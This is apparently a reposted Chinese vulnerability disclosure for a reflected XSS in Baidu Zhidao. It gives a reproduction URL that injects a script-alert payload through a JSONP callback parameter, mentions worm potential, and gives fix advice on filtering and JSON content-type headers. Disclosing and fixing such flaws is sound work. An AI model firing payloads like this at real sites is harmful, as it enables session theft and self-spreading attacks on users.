百度知道
<危害>
百度知道存在反射型xss,可以做诱惑点击导致蠕虫。
<重现方法>
http://zhidao.baidu.com/utask/qb/info?callback=<script>alert(/xss by cc/)</script>


<修复建议>
1.加强过滤。
2.json接口存在风险:
json接口需要设置content-type 添加:header('content-type: application/json');
这样即使json接口存在跨站漏洞,攻击者也难以利用。
版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。
发表评论